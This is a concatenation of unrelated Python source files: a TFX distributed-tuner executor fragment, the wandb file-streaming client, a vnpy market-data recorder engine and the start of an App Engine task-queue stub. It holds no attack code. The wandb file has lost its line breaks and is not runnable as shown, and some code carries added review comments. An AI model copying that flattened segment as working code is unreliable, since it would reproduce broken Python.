      # https://github.com/keras-team/keras-tuner/blob/e8b0ad3ecae471c73e17cb41f37e6f99202ac0dd/kerastuner/engine/base_tuner.py#L74-L76
      tuner_executor.search(input_dict, exec_properties, _WORKING_DIRECTORY)

    # Because of KerasTuner's interface whereby behavior is controlled
    # by environment variables, starting the chief oracle in a sub-process,
    # as opposed to another thread in the main process, in order not to leak
    # the environment variables.
    result = multiprocessing.Process(target=_run_chief_oracle)
    result.start()

    logging.info('Chief oracle started at PID: %s', result.pid)
    return result

  def _search(self, input_dict: Dict[Text, List[types.Artifact]],
              exec_properties: Dict[Text, List[types.Artifact]]):
    """Conducts a single search loop, setting up chief oracle if necessary."""

    # If not distributed, simply conduct search and return.
    if self._tuner_id is None:
      return tuner_executor.search(input_dict, exec_properties,
                                   _WORKING_DIRECTORY)

    if _need_chief_oracle(exec_properties):

      # If distributed search, and this node is chief, start a chief oracle
      # process before conducting search by itself.
      if self._is_chief:
        # Tuner with chief oracle will block forever. As such, start it in
        # a subprocess and manage its lifecycle by the main process.
        # Note that the Tuner with chief oracle does not run search loop,
        # hence does not run TensorFlow code in the subprocess.
        self._chief_process = self._start_chief_oracle_in_subprocess(
            input_dict, exec_properties)

      # If distributed, both master and worker need to know where the oracle is.
      # Per KerasTuner's interface, it is configured through env variables.
      # This only affects the current main process, which is designed to be
      # single-threaded. As such, mutation of this otherwise global state is
      # safe.
      os.environ['KERASTUNER_ORACLE_IP'] = self._master_addr
      os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port

      logging.info('Oracle chief is known to be at: %s:%s',
                   os.environ['KERASTUNER_ORACLE_IP'],
                   os.environ['KERASTUNER_ORACLE_PORT'])

    # Conduct tuner search loop, regardless of master or worker.
    # There is only one Tuner instance in the current process, as such,
    # controllling the id of the Tuner instance via environment variable
    # is safe.
    os.environ['KERASTUNER_TUNER_ID'] = self._tuner_id
    logging.info('Setting KERASTUNER_TUNER_ID with %s',
                 os.environ['KERASTUNER_TUNER_ID'])

    return tuner_executor.search(input_dict, exec_properties,
                                 _WORKING_DIRECTORY)

  def __init__(self, context):
    super(_WorkerExecutor, self).__init__(context)

    # Those fields are populated only when running in distribution.
    self._is_chief = False
    self._tuner_id = None
    self._master_addr = None
    self._master_port = None
    self._chief_process = None  # Populated when the chief oracle is started.

    # Initialize configuration of distribution according to CLUSTER_SPEC
    logging.info('Initializing cluster spec... ')

    cluster_spec = json.loads(os.environ.get('CLUSTER_SPEC', '{}'))

    # If CLUSTER_SPEC is not present, assume single-machine tuning.
    if not cluster_spec:
      return

    self._master_addr, self._master_port = (
        # We rely on Cloud AI Platform Training service's specification whereby
        # there will be no more than one master replica.
        # https://cloud.google.com/ai-platform/training/docs/distributed-training-containers#cluster-spec-format
        cluster_spec['cluster']['master'][0].split(':'))

    self._tuner_id = (
        'tfx-tuner-%s-%d' % (
            cluster_spec['task']['type'],  # 'master' or 'worker'
            cluster_spec['task']['index']  # zero-based index
        ))

    logging.info('Tuner ID is: %s', self._tuner_id)

    self._is_chief = cluster_spec['task']['type'] == 'master'

    logging.info('Cluster spec initalized with: %s', cluster_spec)

  def __del__(self):
    self._close()

  def _close(self) -> None:
    """Kills the chief oracle sub-process, if still running."""
    if self._chief_process and self._chief_process.is_alive():
      logging.info('Terminating chief oracle at PID: %s',
                   self._chief_process.pid)
      self._chief_process.terminate()

  def Do(self, input_dict: Dict[Text, List[types.Artifact]],
         output_dict: Dict[Text, List[types.Artifact]],
         exec_properties: Dict[Text, Any]) -> None:

    tuner = self._search(input_dict, exec_properties)

    # Only the chief worker writes out the best hyperparameters; other
    # workers contributed trials but produce no artifact.
    if self._tuner_id is not None and not self._is_chief:
      logging.info('Returning since this is not chief worker.')
      return

    tuner_executor.write_best_hyperparameters(tuner, output_dict)
    self._close()
file_stream.py
import base64 import binascii import collections import itertools import logging import os import sys import random import requests import threading import time from dataclasses import dataclass from typing import TYPE_CHECKING, Any, Dict, Iterator, List, Tuple import wandb from wandb import util from wandb import env import six from six.moves import queue from ..lib import file_stream_utils logger = logging.getLogger(__name__) Chunk = collections.namedtuple("Chunk", ("filename", "data")) if TYPE_CHECKING: from typing import Any, List, Dict class DefaultFilePolicy(object): def __init__(self, start_chunk_id=0): self._chunk_id = start_chunk_id def process_chunks(self, chunks): chunk_id = self._chunk_id self._chunk_id += len(chunks) return {"offset": chunk_id, "content": [c.data for c in chunks]} class JsonlFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): chunk_id = self._chunk_id # TODO: chunk_id is getting reset on each request... self._chunk_id += len(chunks) chunk_data = [] for chunk in chunks: if len(chunk.data) > util.MAX_LINE_BYTES: msg = "Metric data exceeds maximum size of {} ({})".format( util.to_human_size(util.MAX_LINE_BYTES), util.to_human_size(len(chunk.data)), ) wandb.termerror(msg, repeat=False) util.sentry_message(msg) else: chunk_data.append(chunk.data) return { "offset": chunk_id, "content": chunk_data, } class SummaryFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): data = chunks[-1].data if len(data) > util.MAX_LINE_BYTES: msg = "Summary data exceeds maximum size of {}. Dropping it.".format( util.to_human_size(util.MAX_LINE_BYTES) ) wandb.termerror(msg, repeat=False) util.sentry_message(msg) return False return {"offset": 0, "content": [data]} @dataclass class StreamCRState: """There are two streams: stdout and stderr. We create two instances for each stream. An instance holds state about: found_cr: if a carriage return has been found in this stream. cr: most recent offset (line number) where we found \r. 
We update this offset with every progress bar update. last_normal: most recent offset without a \r in this stream. i.e the most recent "normal" line. """ found_cr: bool = False cr = None last_normal = None class CRDedupeFilePolicy(DefaultFilePolicy): """File stream policy that removes characters that would be erased by carriage returns. This is what a terminal does. We use it for console output to reduce the amount of data we need to send over the network (eg. for progress bars), while preserving the output's appearance in the web app. CR stands for "carriage return", for the character \r. It tells the terminal to move the cursor back to the start of the current line. Progress bars (like tqdm) use \r repeatedly to overwrite a line with newer updates. This gives the illusion of the progress bar filling up in real-time. """ def __init__(self, start_chunk_id=0): super(CRDedupeFilePolicy, self).__init__(start_chunk_id=start_chunk_id) self._prev_chunk = None self.global_offset = 0 # cr refers to carriage return \r self.stderr = StreamCRState() self.stdout = StreamCRState() def get_consecutive_offsets(self, console: Dict) -> List[Any]: """ Args: console: Dict[int, str] which maps offsets (line numbers) to lines of text. It represents a mini version of our console dashboard on the UI. Returns: A list of intervals (we compress consecutive line numbers into an interval). Example: >>> console = {2: "", 3: "", 4: "", 5: "", 10: "", 11: "", 20: ""} >>> get_consecutive_offsets(console) [(2, 5), (10, 11), (20, 20)] """ offsets = sorted(list(console.keys())) intervals: List = [] for i, num in enumerate(offsets): if i == 0: intervals.append([num, num]) continue largest = intervals[-1][1] if num == largest + 1: intervals[-1][1] = num else: intervals.append([num, num]) return intervals def split_chunk(self, chunk: Chunk) -> Tuple[str, str]: """ Args: chunk: object with two fields: filename (str) & data (str) `chunk.data` is a str containing the lines we want. 
It usually contains \n or \r or both. `chunk.data` has two possible formats (for the two streams - stdout and stderr): - "2020-08-25T20:38:36.895321 this is my line of text\nsecond line\n" - "ERROR 2020-08-25T20:38:36.895321 this is my line of text\nsecond line\nthird\n" Here's another example with a carriage return \r. - "ERROR 2020-08-25T20:38:36.895321 \r progress bar\n" Returns: A 2-tuple of strings. First str is prefix, either "ERROR {timestamp} " or "{timestamp} ". Second str is the rest of the string. Example: >>> chunk = Chunk(filename="output.log", data="ERROR 2020-08-25T20:38 this is my line of text\n") >>> split_chunk(chunk) ("ERROR 2020-08-25T20:38 ", "this is my line of text\n") """ prefix = "" token, rest = chunk.data.split(" ", 1) if token == "ERROR": prefix += token + " " token, rest = rest.split(" ", 1) prefix += token + " " return prefix, rest def process_chunks(self, chunks: List) -> List[Dict]: """ Args: chunks: List of Chunk objects. See description of chunk above in `split_chunk(...)`. Returns: List[Dict]. Each dict in the list contains two keys: an `offset` which holds the line number and `content` which maps to a list of consecutive lines starting from that offset. `offset` here means global line number in our console on the UI. Example: >>> chunks = [ Chunk("output.log", "ERROR 2020-08-25T20:38 this is my line of text\nboom\n"), Chunk("output.log", "2020-08-25T20:38 this is test\n"), ] >>> process_chunks(chunks) [ {"offset": 0, "content": [ "ERROR 2020-08-25T20:38 this is my line of text\n", "ERROR 2020-08-25T20:38 boom\n", "2020-08-25T20:38 this is test\n" ] } ] """ # Dict[int->str], each offset (line number) mapped to a line. # Represents a mini-version of our console pane on the UI. 
console = {} sep = os.linesep for c in chunks: prefix, logs_str = self.split_chunk(c) logs = logs_str.split(sep) for line in logs: stream = self.stderr if prefix.startswith("ERROR ") else self.stdout if line.startswith("\r"): # line starting with \r will always overwrite a previous offset. offset = stream.cr if stream.found_cr else stream.last_normal or 0 stream.cr = offset stream.found_cr = True console[offset] = prefix + line[1:] + "\n" # Usually logs_str = "\r progress bar\n" for progress bar updates. # If instead logs_str = "\r progress bar\n text\n text\n", # treat this as the end of a progress bar and reset accordingly. if ( logs_str.count(sep) > 1 and logs_str.replace(sep, "").count("\r") == 1 ): stream.found_cr = False elif line: console[self.global_offset] = prefix + line + "\n" stream.last_normal = self.global_offset self.global_offset += 1 intervals = self.get_consecutive_offsets(console) ret = [] for (a, b) in intervals: ret.append({"offset": a, "content": [console[i] for i in range(a, b + 1)]}) return ret class BinaryFilePolicy(DefaultFilePolicy): def process_chunks(self, chunks): data = b"".join([c.data for c in chunks]) enc = base64.b64encode(data).decode("ascii") self._offset += len(data) return {"offset": self._offset, "content": enc, "encoding": "base64"} class FileStreamApi(object): """Pushes chunks of files to our streaming endpoint. This class is used as a singleton. It has a thread that serializes access to the streaming endpoint and performs rate-limiting and batching. TODO: Differentiate between binary/text encoding. 
""" Finish = collections.namedtuple("Finish", ("exitcode")) Preempting = collections.namedtuple("Preempting", ()) PushSuccess = collections.namedtuple("PushSuccess", ("artifact_id", "save_name")) HTTP_TIMEOUT = env.get_http_timeout(10) MAX_ITEMS_PER_PUSH = 10000 def __init__(self, api, run_id, start_time, settings=None): if settings is None: settings = dict() # NOTE: exc_info is set in thread_except_body context and readable by calling threads self._exc_info = None self._settings = settings self._api = api self._run_id = run_id self._start_time = start_time self._client = requests.Session() self._client.auth = ("api", api.api_key) self._client.timeout = self.HTTP_TIMEOUT self._client.headers.update( { "User-Agent": api.user_agent, "X-WANDB-USERNAME": env.get_username(), "X-WANDB-USER-EMAIL": env.get_user_email(), } ) self._file_policies = {} self._dropped_chunks = 0 self._queue = queue.Queue() self._thread = threading.Thread(target=self._thread_except_body) # It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which # cleans this thread up. 
self._thread.name = "FileStreamThread" self._thread.daemon = True self._init_endpoint() def _init_endpoint(self): settings = self._api.settings() settings.update(self._settings) self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format( base=settings["base_url"], entity=settings["entity"], project=settings["project"], run=self._run_id, ) def start(self): self._init_endpoint() self._thread.start() def set_default_file_policy(self, filename, file_policy): """Set an upload policy for a file unless one has already been set.""" if filename not in self._file_policies: self._file_policies[filename] = file_policy def set_file_policy(self, filename, file_policy): self._file_policies[filename] = file_policy @property def heartbeat_seconds(self): # Defaults to 30 return self._api.dynamic_settings["heartbeat_seconds"] def rate_limit_seconds(self): run_time = time.time() - self._start_time if run_time < 60: return max(1, self.heartbeat_seconds / 15) elif run_time < 300: return max(2.5, self.heartbeat_seconds / 3) else: return max(5, self.heartbeat_seconds) def _read_queue(self): # called from the push thread (_thread_body), this does an initial read # that'll block for up to rate_limit_seconds. Then it tries to read # as much out of the queue as it can. We do this because the http post # to the server happens within _thread_body, and can take longer than # our rate limit. So next time we get a chance to read the queue we want # read all the stuff that queue'd up since last time. # # If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread # will get behind and data will buffer up in the queue. 
return util.read_many_from_queue( self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds() ) def _thread_body(self): posted_data_time = time.time() posted_anything_time = time.time() ready_chunks = [] uploaded = set() finished = None while finished is None: items = self._read_queue() for item in items: if isinstance(item, self.Finish): finished = item elif isinstance(item, self.Preempting): request_with_retry( self._client.post, self._endpoint, json={ "complete": False, "preempting": True, "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) uploaded = set() elif isinstance(item, self.PushSuccess): uploaded.add(item.save_name) else: # item is Chunk ready_chunks.append(item) cur_time = time.time() if ready_chunks and ( finished or cur_time - posted_data_time > self.rate_limit_seconds() ): posted_data_time = cur_time posted_anything_time = cur_time self._send(ready_chunks) ready_chunks = [] if cur_time - posted_anything_time > self.heartbeat_seconds: posted_anything_time = cur_time self._handle_response( request_with_retry( self._client.post, self._endpoint, json={ "complete": False, "failed": False, "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) ) uploaded = set() # post the final close message. 
(item is self.Finish instance now) request_with_retry( self._client.post, self._endpoint, json={ "complete": True, "exitcode": int(finished.exitcode), "dropped": self._dropped_chunks, "uploaded": list(uploaded), }, ) def _thread_except_body(self): # TODO: Consolidate with internal_util.ExceptionThread try: self._thread_body() except Exception as e: exc_info = sys.exc_info() self._exc_info = exc_info logger.exception("generic exception in filestream thread") util.sentry_exc(exc_info, delay=True) raise e def _handle_response(self, response): """Logs dropped chunks and updates dynamic settings""" if isinstance(response, Exception): wandb.termerror( "Dropped streaming file chunk (see wandb/debug-internal.log)" ) logging.exception("dropped chunk %s" % response) self._dropped_chunks += 1 else: parsed: dict = None try: parsed = response.json() except Exception: pass if isinstance(parsed, dict): limits = parsed.get("limits") if isinstance(limits, dict): self._api.dynamic_settings.update(limits) def _send(self, chunks): # create files dict. dict of <filename: chunks> pairs where chunks is a list of # [chunk_id, chunk_data] tuples (as lists since this will be json). files = {} # Groupby needs group keys to be consecutive, so sort first. 
chunks.sort(key=lambda c: c.filename) for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename): file_chunks = list(file_chunks) # groupby returns iterator # Specific file policies are set by internal/sender.py self.set_default_file_policy(filename, DefaultFilePolicy()) files[filename] = self._file_policies[filename].process_chunks(file_chunks) if not files[filename]: del files[filename] for fs in file_stream_utils.split_files(files, max_bytes=util.MAX_LINE_BYTES): self._handle_response( request_with_retry( self._client.post, self._endpoint, json={"files": fs, "dropped": self._dropped_chunks}, retry_callback=self._api.retry_callback, ) ) def stream_file(self, path): name = path.split("/")[-1] with open(path) as f: self._send([Chunk(name, line) for line in f]) def enqueue_preempting(self): self._queue.put(self.Preempting()) def push(self, filename, data): """Push a chunk of a file to the streaming endpoint. Arguments: filename: Name of file that this is a chunk of. chunk_id: TODO: change to 'offset' chunk: File data. """ self._queue.put(Chunk(filename, data)) def push_success(self, artifact_id, save_name): """Notification that a file upload has been successfully completed Arguments: artifact_id: ID of artifact save_name: saved name of the uploaded file """ self._queue.put(self.PushSuccess(artifact_id, save_name)) def finish(self, exitcode): """Cleans up. Anything pushed after finish will be dropped. Arguments: exitcode: The exitcode of the watched process. """ self._queue.put(self.Finish(exitcode)) # TODO(jhr): join on a thread which exited with an exception is a noop, clean up this path self._thread.join() if self._exc_info: logger.error("FileStream exception", exc_info=self._exc_info) # reraising the original exception, will get recaught in internal.py for the sender thread six.reraise(*self._exc_info) MAX_SLEEP_SECONDS = 60 * 5 def request_with_retry(func, *args, **kwargs): """Perform a requests http call, retrying with exponential backoff. 
    Arguments:
        func: An http-requesting function to call, like requests.post
        max_retries: Maximum retries before giving up. By default we retry
            30 times in ~2 hours before dropping the chunk
        *args: passed through to func
        **kwargs: passed through to func
    """
    max_retries = kwargs.pop("max_retries", 30)
    retry_callback = kwargs.pop("retry_callback", None)
    sleep = 2
    retry_count = 0
    while True:
        try:
            response = func(*args, **kwargs)
            response.raise_for_status()
            return response
        except (
            requests.exceptions.ConnectionError,
            requests.exceptions.HTTPError,
            requests.exceptions.Timeout,
        ) as e:
            if isinstance(e, requests.exceptions.HTTPError):
                # Non-retriable HTTP errors.
                #
                # We retry 500s just to be cautious, and because the back end
                # returns them when there are infrastructure issues. If retrying
                # some request winds up being problematic, we'll change the
                # back end to indicate that it shouldn't be retried.
                if e.response is not None and e.response.status_code in {
                    400,
                    403,
                    404,
                    409,
                }:
                    # NOTE: failures are returned, not raised; callers check
                    # isinstance(result, Exception) (see _handle_response).
                    return e
            if retry_count == max_retries:
                return e
            retry_count += 1
            # Jittered exponential backoff: delay in [sleep, 1.25 * sleep).
            delay = sleep + random.random() * 0.25 * sleep
            if isinstance(e, requests.exceptions.HTTPError) and (
                e.response is not None and e.response.status_code == 429
            ):
                err_str = "Filestream rate limit exceeded, retrying in {} seconds".format(
                    delay
                )
                if retry_callback:
                    retry_callback(e.response.status_code, err_str)
                logger.info(err_str)
            else:
                pass
            logger.warning(
                "requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s",
                e,
                func,
                args,
                kwargs,
            )
            time.sleep(delay)
            sleep *= 2
            if sleep > MAX_SLEEP_SECONDS:
                sleep = MAX_SLEEP_SECONDS
        except requests.exceptions.RequestException as e:
            error_message = "unknown error"
            try:
                # NOTE(review): if func() itself raised, `response` is unbound
                # here and this line raises NameError, which the broad except
                # below swallows, leaving "unknown error" — confirm intended.
                error_message = response.json()["error"]  # XXX clean this up
            except Exception:
                pass
            logger.error("requests_with_retry error: {}".format(error_message))
            logger.exception(
                "requests_with_retry encountered unretryable exception: %s", e
            )
            return e
# ==== engine.py ====
import sys
from threading import Thread
from queue import Queue, Empty
from copy import copy
from collections import defaultdict
from typing import Any, Dict, List

from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.object import (
    SubscribeRequest,
    TickData,
    BarData,
    ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT, EVENT_TIMER
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import BaseDatabase, get_database

from vnpy_spreadtrading.base import EVENT_SPREAD_DATA, SpreadData


APP_NAME: str = "DataRecorder"

EVENT_RECORDER_LOG: str = "eRecorderLog"
EVENT_RECORDER_UPDATE: str = "eRecorderUpdate"
EVENT_RECORDER_EXCEPTION: str = "eRecorderException"


class RecorderEngine(BaseEngine):
    """
    For running data recorder.
    """

    # Class-level default; load_setting() derives the per-account file name
    # from this and stores it on the instance.
    setting_filename: str = "data_recorder_setting.json"

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine) -> None:
        """Initializes queues, recording maps and the database connection."""
        super().__init__(main_engine, event_engine, APP_NAME)

        self.queue: Queue = Queue()
        self.thread: Thread = Thread(target=self.run)
        self.active: bool = False

        self.tick_recordings: Dict[str, Dict] = {}
        self.bar_recordings: Dict[str, Dict] = {}
        self.bar_generators: Dict[str, BarGenerator] = {}

        # Flush buffered ticks/bars to the database every `timer_interval`
        # timer events.
        self.timer_count: int = 0
        self.timer_interval: int = 10

        self.ticks: Dict[str, List[TickData]] = defaultdict(list)
        self.bars: Dict[str, List[BarData]] = defaultdict(list)

        self.database: BaseDatabase = get_database()

    # Modified from upstream: supports per-account data storage.
    def engine_start(self, account_name: str) -> None:
        """Loads per-account settings, registers events and starts recording."""
        self.load_setting(account_name)
        self.register_event()
        self.start()
        self.put_event()

    def load_setting(self, account_name: str) -> None:
        """Loads tick/bar recording lists from the per-account setting file."""
        # Derive from the class-level default so repeated calls do not stack
        # account suffixes onto an already-suffixed instance filename.
        base_name: str = RecorderEngine.setting_filename.split(".")[0]
        self.setting_filename = f"{base_name}_{account_name}.json"
        setting: dict = load_json(self.setting_filename)
        self.tick_recordings = setting.get("tick", {})
        self.bar_recordings = setting.get("bar", {})

    def save_setting(self) -> None:
        """Persists the current recording lists to the setting file."""
        setting: dict = {
            "tick": self.tick_recordings,
            "bar": self.bar_recordings
        }
        save_json(self.setting_filename, setting)

    def run(self) -> None:
        """Worker-thread loop: drains the queue and writes data to the database.

        Any unexpected exception stops the loop and is forwarded on the event
        engine as EVENT_RECORDER_EXCEPTION.
        """
        while self.active:
            try:
                task: Any = self.queue.get(timeout=1)
                task_type, data = task

                if task_type == "tick":
                    self.database.save_tick_data(data)
                elif task_type == "bar":
                    self.database.save_bar_data(data)
            except Empty:
                continue
            except Exception:
                self.active = False

                info = sys.exc_info()
                event: Event = Event(EVENT_RECORDER_EXCEPTION, info)
                self.event_engine.put(event)

    def close(self) -> None:
        """Stops the worker thread and waits for it to finish."""
        self.active = False

        # Fix: Thread.isAlive() was removed in Python 3.9; is_alive() is the
        # correct (and long-available) spelling.
        if self.thread.is_alive():
            self.thread.join()

    def start(self) -> None:
        """Starts the database-writer thread."""
        self.active = True
        self.thread.start()

    def add_bar_recording(self, vt_symbol: str) -> None:
        """Adds a symbol to the K-line (bar) recording list."""
        if vt_symbol in self.bar_recordings:
            self.write_log(f"已在K线记录列表中:{vt_symbol}")
            return

        # LOCAL exchange symbols (spreads) need no contract/subscription.
        if Exchange.LOCAL.value not in vt_symbol:
            contract: ContractData = self.main_engine.get_contract(vt_symbol)
            if not contract:
                self.write_log(f"找不到合约:{vt_symbol}")
                return

            self.bar_recordings[vt_symbol] = {
                "symbol": contract.symbol,
                "exchange": contract.exchange.value,
                "gateway_name": contract.gateway_name
            }

            self.subscribe(contract)
        else:
            self.bar_recordings[vt_symbol] = {}

        self.save_setting()
        self.put_event()

        self.write_log(f"添加K线记录成功:{vt_symbol}")

    def add_tick_recording(self, vt_symbol: str) -> None:
        """Adds a symbol to the tick recording list."""
        if vt_symbol in self.tick_recordings:
            self.write_log(f"已在Tick记录列表中:{vt_symbol}")
            return

        # For normal contract
        if Exchange.LOCAL.value not in vt_symbol:
            contract: ContractData = self.main_engine.get_contract(vt_symbol)
            if not contract:
                self.write_log(f"找不到合约:{vt_symbol}")
                return

            self.tick_recordings[vt_symbol] = {
                "symbol": contract.symbol,
                "exchange": contract.exchange.value,
                "gateway_name": contract.gateway_name
            }

            self.subscribe(contract)
        # No need to subscribe for spread data
        else:
            self.tick_recordings[vt_symbol] = {}

        self.save_setting()
        self.put_event()

        self.write_log(f"添加Tick记录成功:{vt_symbol}")

    def remove_bar_recording(self, vt_symbol: str) -> None:
        """Removes a symbol from the K-line recording list."""
        if vt_symbol not in self.bar_recordings:
            self.write_log(f"不在K线记录列表中:{vt_symbol}")
            return

        self.bar_recordings.pop(vt_symbol)
        self.save_setting()
        self.put_event()

        self.write_log(f"移除K线记录成功:{vt_symbol}")

    def remove_tick_recording(self, vt_symbol: str) -> None:
        """Removes a symbol from the tick recording list."""
        if vt_symbol not in self.tick_recordings:
            self.write_log(f"不在Tick记录列表中:{vt_symbol}")
            return

        self.tick_recordings.pop(vt_symbol)
        self.save_setting()
        self.put_event()

        self.write_log(f"移除Tick记录成功:{vt_symbol}")

    def register_event(self) -> None:
        """Registers all event handlers on the event engine."""
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)
        self.event_engine.register(EVENT_TICK, self.process_tick_event)
        self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
        self.event_engine.register(EVENT_SPREAD_DATA, self.process_spread_event)

    def update_tick(self, tick: TickData) -> None:
        """Routes a tick into tick recording and/or bar generation."""
        if tick.vt_symbol in self.tick_recordings:
            self.record_tick(copy(tick))

        if tick.vt_symbol in self.bar_recordings:
            bg: BarGenerator = self.get_bar_generator(tick.vt_symbol)
            bg.update_tick(copy(tick))

    def process_timer_event(self, event: Event) -> None:
        """Every `timer_interval` ticks of the timer, flushes buffers to the queue."""
        self.timer_count += 1
        if self.timer_count < self.timer_interval:
            return
        self.timer_count = 0

        for bars in self.bars.values():
            self.queue.put(("bar", bars))
        self.bars.clear()

        for ticks in self.ticks.values():
            self.queue.put(("tick", ticks))
        self.ticks.clear()

    def process_tick_event(self, event: Event) -> None:
        """Handles EVENT_TICK."""
        tick: TickData = event.data
        self.update_tick(tick)

    def process_contract_event(self, event: Event) -> None:
        """Re-subscribes recorded symbols when their contract arrives."""
        contract: ContractData = event.data
        vt_symbol: str = contract.vt_symbol

        if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings):
            self.subscribe(contract)

    def process_spread_event(self, event: Event) -> None:
        """Handles spread data by converting it to a synthetic tick."""
        spread: SpreadData = event.data
        tick: TickData = spread.to_tick()

        # Filter not inited spread data
        if tick.datetime:
            self.update_tick(tick)

    def write_log(self, msg: str) -> None:
        """Emits a log message on the event engine."""
        event: Event = Event(
            EVENT_RECORDER_LOG,
            msg
        )
        self.event_engine.put(event)

    def put_event(self) -> None:
        """Publishes the (sorted) recording lists for the UI."""
        tick_symbols: List[str] = list(self.tick_recordings.keys())
        tick_symbols.sort()

        bar_symbols: List[str] = list(self.bar_recordings.keys())
        bar_symbols.sort()

        data: dict = {
            "tick": tick_symbols,
            "bar": bar_symbols
        }

        event: Event = Event(
            EVENT_RECORDER_UPDATE,
            data
        )
        self.event_engine.put(event)

    def record_tick(self, tick: TickData) -> None:
        """Buffers a tick for the next timer flush."""
        self.ticks[tick.vt_symbol].append(tick)

    def record_bar(self, bar: BarData) -> None:
        """Buffers a bar for the next timer flush."""
        self.bars[bar.vt_symbol].append(bar)

    def get_bar_generator(self, vt_symbol: str) -> BarGenerator:
        """Returns (creating on demand) the bar generator for a symbol."""
        bg: BarGenerator = self.bar_generators.get(vt_symbol, None)

        if not bg:
            bg = BarGenerator(self.record_bar)
            self.bar_generators[vt_symbol] = bg

        return bg

    def subscribe(self, contract: ContractData) -> None:
        """Subscribes to market data for the given contract."""
        req: SubscribeRequest = SubscribeRequest(
            symbol=contract.symbol,
            exchange=contract.exchange
        )
        self.main_engine.subscribe(req, contract.gateway_name)
# ==== taskqueue_stub.py ====
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""Stub version of the Task Queue API.

This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.

As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""

# NOTE: This is Python 2 code (see `itervalues` usage below); it is not
# Python 3 compatible.

from __future__ import with_statement

__all__ = []

import base64
import bisect
import calendar
import datetime
import logging
import os
import random
import string
import threading
import time

import taskqueue_service_pb
import taskqueue

from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.api import request_info
# NOTE(review): this rebinds the top-level `taskqueue` import above; the last
# import wins — confirm the shadowing is intended.
from google.appengine.api.taskqueue import taskqueue
from google.appengine.runtime import apiproxy_errors


DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0

DEFAULT_BUCKET_SIZE = 5

# Maximum time into the future a task may be scheduled.
MAX_ETA = datetime.timedelta(days=30)

MAX_PULL_TASK_SIZE_BYTES = 2 ** 20

MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)

MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES

MAX_REQUEST_SIZE = 32 << 20

# Headers managed by the stub itself; stripped from stored task headers.
BUILT_IN_HEADERS = set(['x-appengine-queuename',
                        'x-appengine-taskname',
                        'x-appengine-taskexecutioncount',
                        'x-appengine-taskpreviousresponse',
                        'x-appengine-taskretrycount',
                        'x-appengine-tasketa',
                        'x-appengine-development-payload',
                        'content-length'])

DEFAULT_QUEUE_NAME = 'default'

# 1e500 overflows the float literal range and evaluates to +infinity.
INF = 1e500

QUEUE_MODE = taskqueue_service_pb.TaskQueueMode

# Queues created automatically on first access:
# name -> (refill rate/sec, bucket size, user-visible rate string).
AUTOMATIC_QUEUES = {
    DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
    '__cron': (1, 1, '1/s')}


def _GetAppId(request):
  """Returns the app id to use for the given request.

  Args:
    request: A protocol buffer that has an app_id field.

  Returns:
    A string containing the app id or None if no app id was specified.
  """
  if request.has_app_id():
    return request.app_id()
  else:
    return None


def _SecToUsec(t):
  """Converts a time in seconds since the epoch to usec since the epoch.

  Args:
    t: Time in seconds since the unix epoch

  Returns:
    An integer containing the number of usec since the unix epoch.
  """
  return int(t * 1e6)


def _UsecToSec(t):
  """Converts a time in usec since the epoch to seconds since the epoch.

  Args:
    t: Time in usec since the unix epoch

  Returns:
    A float containing the number of seconds since the unix epoch.
  """
  return t / 1e6


def _FormatEta(eta_usec):
  """Formats a task ETA as a date string in UTC."""
  eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
  return eta.strftime('%Y/%m/%d %H:%M:%S')


def _TruncDelta(timedelta):
  """Strips the microseconds field from a timedelta.

  Args:
    timedelta: a datetime.timedelta.

  Returns:
    A datetime.timedelta with the microseconds field not filled.
  """
  return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)


def _EtaDelta(eta_usec, now):
  """Formats a task ETA as a relative time string."""
  eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
  if eta > now:
    return '%s from now' % _TruncDelta(eta - now)
  else:
    return '%s ago' % _TruncDelta(now - eta)


def QueryTasksResponseToDict(queue_name, task_response, now):
  """Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.

  Args:
    queue_name: The name of the queue this task came from.
    task_response: An instance of TaskQueueQueryTasksResponse_Task.
    now: A datetime.datetime object containing the current time in UTC.

  Returns:
    A dict containing the fields used by the dev appserver's admin console.

  Raises:
    ValueError: A task response contains an unknown HTTP method type.
  """
  task = {}

  task['name'] = task_response.task_name()
  task['queue_name'] = queue_name
